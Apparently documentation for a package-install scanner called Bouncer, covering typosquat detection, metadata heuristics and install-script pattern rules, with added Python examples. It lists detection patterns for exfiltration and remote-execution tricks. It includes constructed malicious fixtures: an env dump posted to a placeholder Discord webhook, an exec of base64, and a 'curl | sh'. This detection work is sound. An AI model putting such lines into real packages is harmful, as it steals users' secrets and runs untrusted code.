CLI

The free CLI runs multiple heuristics and rules on every package install across all supported package managers. All scanning happens on your machine. Nothing is sent to Bouncer's servers.

These heuristics are intentionally simple, but they're surprisingly effective at catching the low-effort malicious packages that make up a lot of real-world registry abuse.

That said, pattern matching has real limits. It misses clever attacks that don't match a known signature, and it generates false positives on legitimate packages that happen to look suspicious — which gets annoying fast when every other install nags you. Cloud AI reads the actual source code with a frontier model to catch novel attacks and dramatically reduce the false positives you have to click through.

Typosquatting detection

Compares the package name against a list of popular packages using Damerau-Levenshtein distance, which counts an insertion, a deletion, a substitution, or a swap of two adjacent characters as one edit each. That catches transposed letters, a missing or extra character, and single-key slips such as keyboard-adjacent typos.

This also helps against slopsquatting, a growing attack vector in which AI coding assistants hallucinate non-existent package names in generated code. Attackers register those names and fill them with malware. Typosquatting detection catches a hallucinated name only when it sits within a small edit distance of a popular package; when it does not, the metadata checks below are what flag it, since such a package is typically brand new with zero download history.

$ npm install colros
🟡 npm install colros intercepted by Bouncer
Possible typosquat of "colors" (edit distance 1)
Did you mean: colors (52M weekly downloads)
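The distance function behind that warning, as an added example that is not Bouncer's own code: the restricted Damerau-Levenshtein distance (optimal string alignment variant) plus a lookup against a small constructed list of popular packages. The list, its download counts other than the 52M for colors, the `min_length` guard and the function names are all assumptions made for the example.

```python
# Added example, not Bouncer's own code: restricted Damerau-Levenshtein
# (optimal string alignment) distance and a typosquat check run against a
# small constructed list of popular package names.

# Constructed sample of popular packages with weekly downloads. Bouncer's
# real list is much larger and is not part of this example.
POPULAR_PACKAGES = {
    "colors": 52_000_000,
    "lodash": 45_000_000,
    "express": 30_000_000,
    "requests": 300_000_000,
}


def osa_distance(a: str, b: str) -> int:
    """Optimal-string-alignment Damerau-Levenshtein distance.

    Insertion, deletion, substitution and a swap of two adjacent characters
    each cost 1. Plain Levenshtein would charge 2 for "colros" -> "colors";
    here it is a single edit, which is what makes swapped letters cheap to catch.
    """
    rows, cols = len(a) + 1, len(b) + 1
    d = [[0] * cols for _ in range(rows)]
    for i in range(rows):
        d[i][0] = i
    for j in range(cols):
        d[0][j] = j
    for i in range(1, rows):
        for j in range(1, cols):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(
                d[i - 1][j] + 1,         # deletion
                d[i][j - 1] + 1,         # insertion
                d[i - 1][j - 1] + cost,  # substitution (or match)
            )
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)  # adjacent transposition
    return d[-1][-1]


def typosquat_matches(name, popular=POPULAR_PACKAGES, max_distance=1, min_length=4):
    """Return [(popular_name, distance, weekly_downloads)] for every popular
    package within max_distance of `name`, nearest and most-downloaded first.

    An exact match is the real package and returns []. Very short names are
    skipped (assumed guard): almost everything is one edit away from a
    three-letter name, so the check would be all noise there.
    """
    name = name.lower()
    if name in popular or len(name) < min_length:
        return []
    hits = []
    for pop, downloads in popular.items():
        distance = osa_distance(name, pop)
        if distance <= max_distance:
            hits.append((pop, distance, downloads))
    return sorted(hits, key=lambda hit: (hit[1], -hit[2]))


def format_warning(manager, name, hits):
    """Render the best match in the style of the CLI output shown above."""
    if not hits:
        return None
    best, distance, downloads = hits[0]
    return (
        f"{manager} install {name} intercepted by Bouncer\n"
        f'Possible typosquat of "{best}" (edit distance {distance})\n'
        f"Did you mean: {best} ({downloads // 1_000_000}M weekly downloads)"
    )


if __name__ == "__main__":
    for candidate in ("colros", "lodsh", "reqeusts", "colors"):
        warning = format_warning("npm", candidate, typosquat_matches(candidate))
        print(warning or f"{candidate}: no typosquat match")
```

One caveat worth keeping in mind when tuning `max_distance`: a threshold of 2 on names of six or seven characters starts matching legitimate, unrelated packages, which is exactly the false-positive noise the page describes.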

Metadata heuristics

Checks package metadata from the registry for signals that correlate with malicious packages. Each check runs independently and can be configured or disabled separately:

  • Package published less than 72 hours ago (configurable via min_package_hours)
  • Package has no README
  • Package runs scripts during installation
  • Fewer than 100 weekly downloads (configurable via min_downloads)

See Configuration for details on adjusting thresholds.
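The four checks above as an added example, not Bouncer's own implementation: each heuristic runs independently against a flattened view of registry metadata and can be disabled on its own. The `min_package_hours` and `min_downloads` keys come from the page; the `check_readme` and `check_install_scripts` toggles, the metadata field names and the sample packages are constructed for the example.

```python
# Added example, not Bouncer's own code: the four metadata heuristics run
# over constructed registry metadata with configurable thresholds.
from datetime import datetime, timedelta, timezone

# Assumed config shape. Only min_package_hours and min_downloads are named in
# the docs; the two boolean toggles are this example's way of disabling a check.
DEFAULT_CONFIG = {
    "min_package_hours": 72,   # flag packages younger than this; None disables
    "min_downloads": 100,      # flag packages below this weekly count; None disables
    "check_readme": True,
    "check_install_scripts": True,
}

# npm lifecycle hooks that run automatically when a dependency is installed
INSTALL_HOOKS = ("preinstall", "install", "postinstall")


def _parse_iso(ts):
    # Registry timestamps look like 2024-05-31T12:00:00.000Z
    return datetime.fromisoformat(ts.replace("Z", "+00:00"))


def check_metadata(meta, config=DEFAULT_CONFIG, now=None):
    """Return one finding string per heuristic that fires; [] means clean.

    `meta` is a flattened view of the registry document (field names assumed):
    created (ISO 8601), readme (str), scripts (dict), weekly_downloads (int).
    """
    now = now or datetime.now(timezone.utc)
    findings = []

    min_hours = config.get("min_package_hours")
    if min_hours is not None:
        age = now - _parse_iso(meta["created"])
        if age < timedelta(hours=min_hours):
            findings.append(
                f"published {age.total_seconds() / 3600:.0f}h ago (threshold {min_hours}h)"
            )

    if config.get("check_readme") and not (meta.get("readme") or "").strip():
        findings.append("no README")

    if config.get("check_install_scripts"):
        hooks = [h for h in INSTALL_HOOKS if h in meta.get("scripts", {})]
        if hooks:
            findings.append("runs install scripts: " + ", ".join(hooks))

    min_downloads = config.get("min_downloads")
    downloads = meta.get("weekly_downloads", 0)
    if min_downloads is not None and downloads < min_downloads:
        findings.append(f"{downloads} weekly downloads (threshold {min_downloads})")

    return findings


# Constructed sample metadata, not real registry data. NOW is pinned so the
# age check is deterministic.
NOW = datetime(2024, 6, 1, tzinfo=timezone.utc)
SUSPICIOUS = {
    "name": "colros",
    "created": "2024-05-31T12:00:00.000Z",  # 12 hours before NOW
    "readme": "",
    "scripts": {"postinstall": "node setup.js"},
    "weekly_downloads": 3,
}
ESTABLISHED = {
    "name": "colors",
    "created": "2015-03-01T00:00:00.000Z",
    "readme": "# colors\nget colors in your node.js console",
    "scripts": {"test": "node tests/index.js"},
    "weekly_downloads": 52_000_000,
}

if __name__ == "__main__":
    for pkg in (SUSPICIOUS, ESTABLISHED):
        print(pkg["name"], "->", check_metadata(pkg, now=NOW) or "clean")
```

Each finding is independent by design: a brand-new package with a README and no install scripts still gets the age and download findings, and setting `min_downloads` to `None` silences only that one check, which is the behaviour the per-check configuration above describes.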

Install script red flags

Scans install scripts and entry points (setup.py, postinstall.js, index.js, __init__.py, etc.) for known malicious patterns.

Block patterns (high confidence)

Pattern                               Why it's dangerous
burpcollaborator.net                  Attacker callback server
Telegram bot sendDocument             Document exfiltration
Discord webhook in install script     Credential exfiltration

Warn patterns (medium confidence)

Pattern                               Why it's suspicious
eval + base64                         Hidden code execution
exec + decode                         Obfuscated payload
requestbin, hookbin, pipedream        Exfiltration service URLs
ngrok.io                              Tunnel to attacker machine
curl | sh in install script           Remote code execution
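The two tables expressed as a scanner, as an added example rather than Bouncer's own rules: single-regex rules carry a severity, the `eval + base64` and `exec + decode` rows are co-occurrence rules that need both halves in the same file, and a package's verdict is its worst file. The regexes are my approximations of the table rows, and the sample install scripts are constructed for the example.

```python
# Added example, not Bouncer's own code: the block/warn tables above as
# regex rules, run over constructed install scripts. The exact patterns
# Bouncer ships are not published on this page; these approximate its rows.
import re

# Single-regex rules: (rule name, regex, severity)
SINGLE_RULES = [
    ("burp-collaborator", r"burpcollaborator\.net", "block"),
    ("telegram-senddocument", r"api\.telegram\.org/bot[^\s\"']*/sendDocument", "block"),
    ("discord-webhook", r"discord(?:app)?\.com/api/webhooks/", "block"),
    ("exfil-service", r"\b(?:requestbin|hookbin|pipedream)\b", "warn"),
    ("ngrok-tunnel", r"\bngrok\.io\b", "warn"),
    ("curl-pipe-sh", r"\bcurl\b[^|\n]*\|\s*(?:sudo\s+)?(?:ba|z)?sh\b", "warn"),
]

# Co-occurrence rules: both regexes must match somewhere in the same file
PAIR_RULES = [
    ("eval-base64", r"\beval\s*\(", r"\bbase64\b|\bb64decode\b|\batob\s*\(", "warn"),
    ("exec-decode", r"\bexec\s*\(", r"\bdecode\b|\bb64decode\b", "warn"),
]

SEVERITY_RANK = {"ok": 0, "warn": 1, "block": 2}


def scan_script(text):
    """Return (verdict, [rule names]); verdict is 'block', 'warn' or 'ok'."""
    hits = []
    for name, pattern, severity in SINGLE_RULES:
        if re.search(pattern, text, re.IGNORECASE):
            hits.append((name, severity))
    for name, first, second, severity in PAIR_RULES:
        if re.search(first, text) and re.search(second, text):
            hits.append((name, severity))
    verdict = max((sev for _, sev in hits), key=SEVERITY_RANK.get, default="ok")
    return verdict, [name for name, _ in hits]


def scan_package(files):
    """Scan a {filename: contents} mapping; the package verdict is its worst file."""
    results = {fname: scan_script(text) for fname, text in files.items()}
    worst = max((v for v, _ in results.values()), key=SEVERITY_RANK.get, default="ok")
    return worst, results


# Constructed sample scripts, not taken from any real package.
SAMPLE_FILES = {
    # postinstall.js: dumps the environment to a Discord webhook -> block
    "postinstall.js": (
        "const body = JSON.stringify({ content: JSON.stringify(process.env) });\n"
        "fetch('https://discord.com/api/webhooks/000000/constructed-example', "
        "{ method: 'POST', body });\n"
    ),
    # setup.py: exec of a base64 blob -> warn (exec + decode)
    "setup.py": (
        "import base64\n"
        "PAYLOAD = 'cHJpbnQoJ2hpJyk='\n"
        "exec(base64.b64decode(PAYLOAD).decode())\n"
    ),
    # install.sh: pipes a download straight into a shell -> warn
    "install.sh": "curl -fsSL https://example.invalid/bootstrap.sh | sh\n",
    # index.js: ordinary module, nothing fires -> ok
    "index.js": "module.exports = function red(s) { return '\\x1b[31m' + s + '\\x1b[0m'; };\n",
}

if __name__ == "__main__":
    verdict, per_file = scan_package(SAMPLE_FILES)
    for fname, (file_verdict, rules) in per_file.items():
        print(f"{file_verdict:5} {fname}: {', '.join(rules) or '-'}")
    print("package verdict:", verdict)
```

The co-occurrence rules are the ones that produce most of the false positives the page warns about: a legitimate build script that calls `exec` on a generated file and `.decode()`s some bytes elsewhere trips `exec + decode` just as a packed payload does, which is why those rows sit in the warn table rather than the block table.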

Binary-only packages

Some packages ship compiled binaries or pre-built artifacts with no readable source code. Bouncer flags these with the binary_no_source rule because source-level scanners can't verify what the code actually does — all the pattern checks above are defeated the moment a package hides its logic in a blob.

Scanning binaries is hard. Reverse-engineering compiled code at scale is an open problem, and generic heuristics produce more noise than signal. It's a known gap and a future focus area for Bouncer. For now, binary-only packages deserve extra scrutiny on every install.